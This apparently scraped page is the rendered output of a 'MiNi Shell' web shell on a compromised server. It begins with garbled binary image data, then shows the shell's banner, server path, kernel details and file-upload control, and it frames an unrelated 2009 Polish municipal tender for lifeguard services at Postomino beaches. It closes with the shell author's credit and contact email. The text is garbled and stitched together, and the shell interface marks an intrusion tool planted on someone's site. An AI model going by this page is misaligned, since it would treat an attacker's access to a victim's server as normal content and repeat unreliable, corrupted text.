JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090430/128308-N-2009.html

<p class="kh_header"><b>Postomino: Organizacja kąpielisk strzeżonych i zapewnienie bezpieczeństwa osób pływających i kąpiących się w obrębie Gminy Postomino w okresie sezonu letniego tj. od 01 czerwca do 15 września 2009 roku</b><br>
<b>Numer ogłoszenia: 128308 - 2009; data zamieszczenia: 30.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Postomino , Postomino 30, 76-113 Postomino, woj. zachodniopomorskie, tel. 0-59 810 85 93, faks 0-59 810 85 84.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja kąpielisk strzeżonych i zapewnienie bezpieczeństwa osób pływających i kąpiących się w obrębie Gminy Postomino w okresie sezonu letniego tj. od 01 czerwca do 15 września 2009 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest Organizacja kąpielisk strzeżonych i zapewnienie bezpieczeństwa osób pływających i kąpiących się w obrębie Gminy Postomino
w okresie sezonu letniego tj. od 01 czerwca do 15 września 2009 roku, zgodnie z przepisami obowiązującymi dla kąpielisk morskich - rozporządzenie Rady Ministrów z dnia 6 maja 1997 r. w sprawie określenia warunków bezpieczeństwa osób przebywających w górach, pływających, kapiących się i uprawiających sporty wodne (Dz.U. z 1997 r., Nr 57, poz. 358) w następującym zakresie:
-	kąpielisko Plaża centralna - odcinek 300 mb linii brzegowej  w okresie 1 lipca - 31 sierpnia 2009 r.,
-	kąpielisko Plaża zachodnia - odcinek 400 mb linii brzegowej  w okresie 1 lipca - 31 sierpnia 2009 r.,
-	kąpielisko Plaża centralna - odcinek 100 mb linii brzegowej, w okresach 15 - 30 czerwca i 1 - 15 września 2009 r.,
-	 kąpielisko Jezioro Marszewo - odcinek 100 mb linii brzegowej, w okresie 1 lipca - 31 sierpnia 2009 r. 
2.	W okresie od 01 do 14 czerwca Wykonawca zobowiązany jest do przygotowania plaży oraz sprzętu ratowniczego do rozpoczęcia sezonu kąpielowego, które nastąpi w dniu 15 czerwca 
2009 r. 
3.	W przypadku lokalizacji na plaży miasteczka plażowego lub innej działalności rekreacyjnej dysponującej własną obsługą ratowniczą, Wykonawca obowiązany jest zorganizować kąpielisko strzeżone z pominięciem ww. lokalizacji, natomiast teren pominięty oznaczyć jako niestrzeżony przez gminne służby ratownicze.
4.	Przy organizacji kąpielisk strzeżonych i zapewnieniu bezpieczeństwa osób pływających i kąpiących się w obrębie plaży centralnej, zachodniej oraz Jeziora Marszewo należy 
w szczególności:
1)	sprawdzić miejsca przeznaczone pod kąpielisko pod względem bezpieczeństwa,
2)	przygotować miejsca ratownikom w celu zapewnienia stałej obserwacji i kontroli osób kąpiących się,
3)	dysponować osobami zdolnymi do wykonania zamówienia:
- 27 ratowników WOPR, w tym: 3 ratowników z uprawnieniami sternika motorowodnego, 2 ratowników o stopniu minimum starszego sternika motorowodnego, 
2 ratowników z uprawnieniami ratownika medycznego, 2 ratowników z uprawnieniami płetwonurka, 17 osób spośród ww. kadry ratowniczej musi posiadać minimum 2-letni staż pracy w WOPR nad morzem, 
- 1 koordynator; 
Wyżej wymienioną kadrę ratowniczą należy przedstawić w wykazie stanowiącym załącznik nr 4 do SIWZ.
4)	zapewnić poprzez ratowników stałą kontrolę lustra wody z brzegu i od strony wody,
5)	zorganizować punkty medyczne na plaży centralnej i zachodniej,
6)	zabezpieczyć ratownicze łodzie wiosłowe na każde stanowisko (na każde 100 m linii brzegowej min. 1szt.),
7)	 zabezpieczyć i wyposażyć stanowiska ratownicze oraz punkty medyczne w niezbędny sprzęt ratunkowy i medyczny (w tym w leki i artykuły sanitarne),  a także w parasole, parawany i leżaki, natomiast kąpieliska w urządzenia sygnalizacyjne i ostrzegawcze 
a także zabezpieczyć ratowników i obsługę punktów medycznych w ubiór zgodny 
z obowiązującymi normami,
8)	 utrzymywać sprzęt ratunkowy i medyczny w należytym stanie umożliwiającym jego stałe użytkowanie, a w przypadku jego awarii lub zużycia - uzupełniać brakujący sprzęt w ciągu 24 godzin, 
9)	 wyraźnie oznaczyć granice kąpielisk, w ramach których oznacza się strefy dla umiejących pływać oraz dla osób nie umiejących pływać,
10)	 ustawić maszty wyposażone w komplet flag informacyjnych,
11)	 zapewnić informację o dopuszczalności lub zakazie kąpieli,
12)	 zabezpieczyć odpowiednie środki łączności umożliwiające utrzymanie bezpośredniej stałej łączności ze służbami ratowniczymi oraz pokrywać koszty ich utrzymania,
13)	dysponować na potrzeby zabezpieczenia ratowniczego w sezonie letnim 2009 samochodem terenowym przygotowanym do transportu osób poszkodowanych 
i wodowania środków motorowodnych, 
14)	dysponować na potrzeby zabezpieczenia ratowniczego w sezonie letnim 2009 łodzią motorową oraz skuterem ratowniczym, które muszą być w ciągłej gotowości, 
15)	uzyskać ekspertyzy dopuszczające kąpieliska do eksploatacji,
16)	wyposażyć na własny koszt wszystkie  łodzie motorowe w sprzęt nurkowy i aparat tlenowy,
17)	 umieścić przy każdym kąpielisku na widocznym miejscu Regulamin kąpieliska,
18)	zorganizować trzyosobowy zespół szybkiego reagowania obejmujący swym zasięgiem plaże centralną i zachodnią, który w momencie zgłoszenia o wypadku natychmiast wypływa łodzią motorową lub udaje się samochodem terenowym na miejsce zdarzenia w celu udzielenia pierwszej pomocy poszkodowanym,
19)	przygotować i pokryć koszty związane z wystawieniem dwóch reprezentacji Gminy w Mistrzostwach ratowników Nivea - WOPR (koszty dojazdu, nocleg, wyżywienie),
20)	 pokryć koszty związane z utrzymaniem  zaplecza socjalnego dla ratowników oraz pokryć koszty poniesione w wyniku eksploatacji bazy ratowników (dotyczy budynku mieszkalnego przy ulicy Łąkowej 2 w Jarosławcu) wynikające z zapisów liczników, 
21)	pokryć koszty związane z utrzymaniem  zaplecza socjalnego dla ratowników oraz ponieść eksploatacyjną opłatę ryczałtową, która wynosi 10,00 zł od osoby za dobę, (dotyczy 4 domków letniskowych na terenie Ośrodka Przywodny w Jarosławcu,
22)	w przypadku zdobycia I miejsca w eliminacjach lub finałach w Mistrzostwach Ratowników Nivea - WOPR ww. koszty związane z utrzymaniem  zaplecza socjalnego dla ratowników i innych osób zatrudnionych przez Wykonawcę do obsługi kąpieliska oraz koszty poniesione w wyniku eksploatacji bazy ratowników (dotyczy budynku mieszkalnego przy ulicy Łąkowej w Jarosławcu oraz 4 domków letniskowych na terenie Ośrodka Przywodny w Jarosławcu przy ul. Spacerowej 6) zostaną poniesione przez Gminę Postomino, 
23)	zawrzeć umowę ubezpieczenia OC w zakresie związanym z funkcjonowaniem kąpielisk w Jarosławcu, ubezpieczyć zatrudnionych ratowników od następstw nieszczęśliwych wypadków, ubezpieczyć cały sprzęt wykorzystywany podczas realizacji zamówienia,
24)	 zabezpieczyć linię brzegową podczas trwania Międzynarodowego Biegu po Plaży, udostępnić do dyspozycji organizatora pojazd typu quad i samochód terenowy,
25)	zabezpieczyć  imprezę pływacką Klif Jarosławca, oraz ufundować nagrody
w wysokości 500 zł,
26)	 utworzyć 24 godzinny zespół szybkiego reagowania, zdolny podjąć akcję poszukiwawczo - ratowniczą w każdych warunkach atmosferycznych,
27)	 po sezonie letnim 2009 r. zabezpieczyć sprzęt ratowniczy, dokonać konserwacji sprzętu motorowodnego oraz zabezpieczyć całoroczną obsługę i możliwość użytkowania tego sprzętu,
28)	Wykonawca pokrywa koszty paliwa, przeprowadza na własny koszt przeglądy techniczne zgodnie z wymaganiami u autoryzowanych przedstawicieli, przeprowadza na własny koszt wszelkie naprawy niezbędne do zachowania sprzętu w stanie niepogorszonym, rejestruje łodzie, itp.),
29)	 Zamawiający przekazuje nieodpłatnie odrębnymi umowami użyczenia do dyspozycji Wykonawcy na czas trwania zamówienia:
-	2 kontenery blaszane o wym. 3mx1,8 m każdy,
-	 2 magazyny o wym. 2,5m x5m każdy,
-	1 budynek mieszkalny przy ulicy Łąkowej 2 w miejscowości Jarosławiec (15 - osobowy), 
-	4 domki letniskowe (w tym: 2 domki 5-osobowe, 1 domek 1 - osobowy, 1 domek 
3 - osobowy)  na terenie Ośrodka Przywodny w miejscowości Jarosławiec,
-	1 łódź motorową, 
-	2 skutery ratownicze, 
-	1 quad.
-	inny sprzęt ratowniczy.
Na Wykonawcy spoczywa obowiązek zabezpieczenia ww. nieruchomości przed osobami postronnymi, ciąży odpowiedzialność za utrzymanie w odpowiednim stanie technicznym oraz przeprowadzanie na własny koszt napraw niezbędnych do zachowania ww. składników majątkowych gminy Postomino w stanie niepogorszonym..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 75.25.20.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
a) do wykonywania zadań w zakresie bezpieczeństwa osób pływających, kąpiących się 
i uprawniających sporty wodne upoważnione są Wodne Ochotnicze Pogotowie Ratunkowe (WOPR) oraz inne organizacje ratownicze, które wykonują  obowiązki i uprawnienia WOPR za zgodą Prezesa Urzędu Kultury Fizycznej i Turystyki. 
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym
i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj. 
a)	dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia:
- 27 ratowników WOPR, w tym: 3 ratowników z uprawnieniami sternika motorowodnego, 2 ratowników o stopniu minimum starszego sternika motorowodnego, 2 ratowników z uprawnieniami ratownika medycznego, 2 ratowników z uprawnieniami płetwonurka, 17 osób spośród ww. kadry ratowniczej musi posiadać minimum 2-letni staż pracy w WOPR nad morzem, 
- 1 koordynator; 
Wyżej wymienioną kadrę ratowniczą należy przedstawić w wykazie stanowiącym załącznik nr 4 do SIWZ.
b)	dysponują  lub będą dysponować następującym sprzętem: 
- 10 łodzi wiosłowych, 
- 1 łódź motorowa, 
- 1 skuter ratowniczy,
- 1 samochód terenowy przygotowany do transportu osób poszkodowanych i wodowania środków motorowodnych.  
Wymieniony powyżej sprzęt należy wykazać w wykazie stanowiącym załącznik nr 5 do SIWZ.
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
a)	 posiadają polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
4)	nie podlegają wykluczeniu z postępowania na podstawie na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych. 
Spełnienie warunków udziału w postępowaniu Zamawiający określi na podstawie analizy wymaganych dokumentów i oświadczeń wymienionych w Instrukcji dla Wykonawców w rozdziale V SIWZ. 
2.	Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu
1)	Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach załączonych do oferty. 
Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnił. 
2)	Ofertę wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że Wykonawca spełnia warunki udziału w postępowaniu o udzieleniu zamówienia Zamawiający żąda przedstawienia następujących dokumentów i oświadczeń:
1.	Wypełniony i podpisany formularz OFERTOWY (wg załącznika nr 1).
2.	Oświadczenie wykonawcy o spełnieniu warunków określonych w art. 22 ust. 1 pkt 1-4  (wg załącznika nr 2) - ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. Nr 223, poz. 1655 z  2007 r. z późn. zm.)
3.	Oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 (wg załącznika nr 3) - ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. Nr 223, poz. 1655 z  2007 r. z późn. zm.).
4.	Aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.	Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia (wg załącznika nr 4).
6.	Dokumenty stwierdzające, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - m.in. patenty, dyplomy, legitymacje WOPR. W przypadku sterników, ratowników medycznych i płetwonurków należy załączyć do oferty legitymację WOPR oraz dokumenty potwierdzające posiadane uprawnienia. 
7.	Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń (sprzętu), którymi dysponuje lub będzie dysponował Wykonawca (wg załącznika nr 5).
8.	Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt. 7, wykonawca wskazał narzędzia i urządzenia (sprzęt), którym będzie dysponował. 
9.	Polisa, a w przypadku jej braku inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
10.	W przypadku działania Wykonawcy przez pełnomocników, należy dołączyć do oferty pełnomocnictwo w oryginale lub uwierzytelniony odpis pełnomocnictwa. Pełnomocnictwo oprócz umocowania pełnomocnika do reprezentowania w imieniu mocodawcy w ubieganiu się o udzielenie zamówienia winno również zawierać umocowanie do poświadczania za zgodność z oryginałem. 
UWAGA !
Wyżej wymienione dokumenty muszą być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę uprawnioną opatrzone czytelnym podpisem lub podpisem nieczytelnym opatrzonym imienną pieczęcią.  

	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.postomino.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Postomin, Postomino 30, 76 -113 Postomino.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.05.2009 godzina 12:00, miejsce: Urząd Gminy Postomino, Postomino 30, 76 -113 Postomino.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com